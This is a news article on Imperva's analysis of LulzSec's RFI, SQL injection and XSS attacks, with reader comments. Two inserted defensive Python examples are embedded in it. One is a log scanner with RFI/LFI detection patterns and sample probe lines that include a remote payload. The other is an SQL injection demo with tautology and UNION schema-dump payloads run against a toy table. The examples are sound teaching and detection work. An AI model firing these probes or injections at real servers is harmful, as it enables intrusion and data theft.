
Report: LulzSec Used SQL Injection, XSS and RFI

Tuesday night security firm Imperva sent over a copy of a report set to go live Wednesday at noon PST, detailing its findings after analyzing the leaked LulzSec chat logs provided by The Guardian. Essentially the now-disbanded hacker group used three attack vectors: SQL Injection, Cross Site Scripting (XSS) and Remote File Include (RFI). The report points out that SQL Injection and XSS are the most common Web security vulnerabilities, and that enterprise security continues to ignore them.

"Lulzsec was a team of hackers focused on breaking applications and databases," the company reports. "There were no virus or malware experts. Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases. For security, this does not mean 'we have updated our anti-virus and put in place a network firewall.' Rather, it means 'we have identified all sensitive data and have put in place technology with the audit and protection capabilities required to safeguard that data.'"

The report, written by Imperva director of security strategy Rob Rachwald, then breaks down the three LulzSec tools – Remote File Include, SQL Injection and Cross Site Scripting – with references to the chat logs. Here's the full scoop:

Tool #1: Remote File Include

The relevant snippet from the chat log (emphasis ours):

lol - storm would you also like the RFI/LFI bot with Google bypass i was talking about while i have this plugged in?

Remember that lol is Kayla, who brought a bot army to Lulzsec's toolbox. The key in the snippet above is "RFI" or remote file include. We published an extensive overview (pdf) of RFI about two months ago. Lulzsec used RFI to get bots to DDoS websites, which is how they brought down the CIA's public site.

In our report, we said that RFI "attacks have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks." We also noted that RFI is "not widely discussed." The key here is "not widely discussed." In other words, Lulzsec used an often overlooked vulnerability to help ambush their targets. An RFI attack inserts some nasty code into a web application server. What does the code do? Usually, RFI is used to take over the web application and steal data. In the case of Lulzsec, they used it to conduct DDoS attacks. The second line, "8,000 RFI with usp flooder", tells you that lol had 8,000 infected servers (not PCs!) to conduct the DDoS attacks. That's pretty sizable. How much so? In our webinar on DDoS 2.0, we estimated that one infected server is equal to 3,000 bot-infected PCs, so 8,000 servers would be like 2.5M PCs.

Finally, our report gives some suggestions on countering RFI attacks.
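The report's countermeasures are only referenced above, so here is an added example that is not from the article or from Imperva's report. It does two things the RFI section describes: it flags RFI probes in ordinary web-server access logs (and, going slightly beyond the text, the LFI and PHP stream-wrapper variants the "RFI/LFI bot" in the chat log would also throw), and it shows the allowlist lookup that removes the vulnerability from an include parameter. The log lines, hosts, script names, parameter names and the `PAGES` table are constructed for this demo.

```python
# Added example (not from the article or Imperva's report): flag RFI/LFI probes
# in web-server access logs, and the allowlist lookup that closes the hole.
# The log lines, hosts, script names, parameter names and the PAGES table
# below are constructed for this demo.
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined-log-format line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# PHP stream wrappers that turn include() of user input into code execution
# or arbitrary reads even when allow_url_include is off.
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|glob)://', re.IGNORECASE)
# Directory traversal and the usual LFI targets.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|/etc/passwd|/proc/self/environ)', re.IGNORECASE)


def classify_param(value: str) -> Optional[str]:
    """Return 'RFI', 'WRAPPER', 'LFI' or None for one query-string value."""
    # parse_qsl already percent-decoded once; decode again to catch %252F-style
    # double encoding that scanners use to slip past naive filters.
    v = unquote(value)
    parts = urlsplit(v)
    if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
        return "RFI"          # include=http://attacker/shell.txt
    if WRAPPER_RE.match(v):
        return "WRAPPER"      # include=php://input, data://..., expect://...
    if "\x00" in v or TRAVERSAL_RE.search(v):
        return "LFI"          # ../../etc/passwd, null-byte suffix truncation
    return None


def scan_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return a finding dict or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_param(value)
        if kind:
            return {"ip": m.group("ip"), "kind": kind, "param": name,
                    "value": value, "status": int(m.group("status"))}
    return None


def scan_log(text: str) -> list:
    """All findings in a block of log text, in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


# Hardened side: the request may only pick a key from a fixed map. Nothing the
# user sends is ever used as a path or URL, so there is nothing to inject into.
PAGES = {"about": "pages/about.php", "contact": "pages/contact.php"}  # hypothetical


def resolve_include(page_param: str) -> Optional[str]:
    return PAGES.get(page_param)


# Constructed sample: one normal request followed by three probes.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2011:13:18:44 +0000] "GET /index.php?page=about HTTP/1.1" 200 4321
203.0.113.7 - - [03/Jun/2011:13:18:45 +0000] "GET /index.php?page=http://198.51.100.9/x.txt? HTTP/1.1" 200 118
203.0.113.7 - - [03/Jun/2011:13:18:46 +0000] "GET /index.php?page=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 512
198.51.100.22 - - [03/Jun/2011:13:19:01 +0000] "GET /view.php?f=php://input HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The status code is worth keeping in the finding: a 200 on an `http://` include value (second sample line) is the one that deserves an incident, because the server fetched and ran something; a 404 is a scanner that missed. The trailing `?` in that payload is the usual trick to turn whatever the application appends (such as `.php`) into a harmless query string on the attacker's URL.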

Tool #2: SQL Injection

Jun 03 13:18:44 [redacted] you mean with the coupons?
Jun 03 13:18:57 [redacted] was it from that SQLi
Jun 03 13:21:57 sabu yeah

Volumes have been written about SQL injection. What more can we possibly write about the biggest vulnerability in the history of mankind that is the cause of millions of lost data records? We described in detail here how SQL injection may have helped with the PBS hack.
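Since the chat log ties the SQLi to "the coupons", here is an added example, not from the article or from Imperva's report, of a coupon lookup written the injectable way and the parameterized way, run against an in-memory SQLite table. The table, columns, rows and the two payloads are constructed for this demo; the point is that the same input reaches both functions and only one of them lets it rewrite the query.

```python
# Added example (not from the article or Imperva's report): one coupon lookup
# written the injectable way and the parameterized way, run against an
# in-memory SQLite table constructed for this demo (table, columns and rows
# are hypothetical).
import sqlite3


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE coupons (code TEXT PRIMARY KEY, owner_email TEXT, discount INTEGER)"
    )
    con.executemany("INSERT INTO coupons VALUES (?, ?, ?)", [
        ("SAVE10", "alice@example.com", 10),
        ("VIP50", "bob@example.com", 50),
        ("STAFF90", "carol@example.com", 90),
    ])
    return con


def lookup_vulnerable(con: sqlite3.Connection, code: str) -> list:
    """User input is spliced into the SQL text, so a quote in it rewrites the query."""
    sql = "SELECT code, owner_email, discount FROM coupons WHERE code = '" + code + "'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, code: str) -> list:
    """The value is bound separately from the statement; it is compared, never parsed."""
    return con.execute(
        "SELECT code, owner_email, discount FROM coupons WHERE code = ?", (code,)
    ).fetchall()


# Two classic payloads: a tautology that returns every row, and a UNION that
# reads the schema out of sqlite_master (column count must match the original
# SELECT, hence the literal 0 as the third column; "--" comments out the
# trailing quote the application appends).
TAUTOLOGY = "x' OR '1'='1"
UNION_SCHEMA = "x' UNION SELECT name, sql, 0 FROM sqlite_master --"


def demo() -> dict:
    """Run an honest code and both payloads through both lookups."""
    con = setup_db()
    return {
        "honest_vuln": lookup_vulnerable(con, "VIP50"),
        "honest_param": lookup_parameterized(con, "VIP50"),
        "tautology_vuln": lookup_vulnerable(con, TAUTOLOGY),
        "tautology_param": lookup_parameterized(con, TAUTOLOGY),
        "union_vuln": lookup_vulnerable(con, UNION_SCHEMA),
        "union_param": lookup_parameterized(con, UNION_SCHEMA),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the honest input both functions return the single VIP50 row, which is why this bug survives testing. With the tautology the concatenated version returns all three coupons and the bound version returns nothing, because it is looking for a coupon literally named `x' OR '1'='1`. The UNION payload is the shape that turns a coupon lookup into a schema dump and, a few requests later, a data dump.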

Tool #3: Cross Site Scripting

May 31 11:19:38 [redacted] XSS in billoreilly lol

Again, volumes on XSS. What more can we possibly write about the 2nd biggest vulnerability in the history of mankind that is the cause of millions of lost data records?

"Just goes to show you that LulzSec was not doing anything revolutionary," Impervia said.

  • officeguy
    They disbanded because the government and companies were investigating them, NOT because their 50 days were up. I guess they think the public is supposed to believe them. They are cowards hiding behind a computer just like criminals who rob people wearing masks. People who agree with what they did need to get their heads checked!!!
  • modinn
    Not a huge shock, as I've rarely seen anyone defend the skill set of these guys. And although I do not condone these attacks in the slightest, it does raise the question: Why have all companies not implemented and/or developed better solutions to XSS and SQL injection attacks?

    You don't have to spend millions and millions of dollars to defend against SQL injection or XSS, they are very well established exploits and can easily be defended against or deterred. Plus it leaves traces, especially if the company has taken steps to make it harder to access SQL command injection. Fix the easy stuff that all crackers can easily exploit (like Lulzsec has) first, and then move on to the harder stuff meant for professional crackers.

    All this talk about building an impenetrable fortress of internet security. It doesn't matter how many packet sniffers, IP loggers, firewalls, or intrusion detectors you have surrounding your fortress, if you don't have a good foundation (essential security fixes), then the fortress will collapse on itself. These guys didn't care about whether their hacks were quiet or not. They WANTED the publicity and that's what made these attacks so successful.
  • gm0n3y
    SQL Injection and XSS are so easy to prevent too. You don't need to be an intelligent programmer to prevent them, just use the latest standards (or even any standards made in the last 5 years or so) and they automatically prevent it. In asp.net you have to override specific settings to allow XSS and don't use dynamic SQL. It may be easier to write, but I have yet to see a case where you couldn't code around the need to use it.
  • illo
    who cares why they were disbanded? they proved, much like anon has, that simple attacks are still way too effective to bother with trying any revolutionary hacks.

    We don't live in a world that allows people to leave their cars running while they go shopping. We live in a world that has crime, and lulzsec and anon have continually proven that if a major cyberwar happens, the US and major corporations have little defenses in place to defend against them.
  • restatement3dofted
    officeguy: They disbanded because the government and companies were investigating them, NOT because their 50 days were up. I guess they think the public is supposed to believe them. They are cowards hiding behind a computer just like criminals who rob people wearing masks. People who agree with what they did need to get their heads checked!!!
    How's the view from up there?
  • tomrippity02
    restatement3dofted: How's the view from up there?
    my thoughts exactly.
  • hoofhearted
    That makes sense. Firewalls and such that are meant to keep people out are no good against these types of attacks, since they are using the same routes that normal application usage would use.
  • the_krasno
    gm0n3y: SQL Injection and XSS are so easy to prevent
    aaaaaaaaaaaaaaaaaaaaaaand the CIA got hacked too. This is sad.
  • wcnighthawk
    So the phrase "Who's the bigger fool, the fool or the fool that follows" is the first thing I thought of when reading this article. I see a lot of comments on Lulzsec about them being no-skill amateurs, using kiddie scripts and basic hacking tools. That may be true, but what's worse: no-skill amateurs using old-school type hacks, or the companies/government that chose to ignore easily patchable loopholes into their systems and allowed the hacks to succeed?
  • dgingeri
    gm0n3y: SQL Injection and XSS are so easy to prevent too. You don't need to be an intelligent programmer to prevent them, just use the latest standards (or even any standards made in the last 5 years or so) and they automatically prevent it. In asp.net you have to override specific settings to allow XSS and don't use dynamic SQL. It may be easier to write, but I have yet to see a case where you couldn't code around the need to use it.
    True, you don't have to be a smart programmer to prevent these things. You just have to not be a lazy programmer. Lazy is the biggest problem in the US and Europe these days.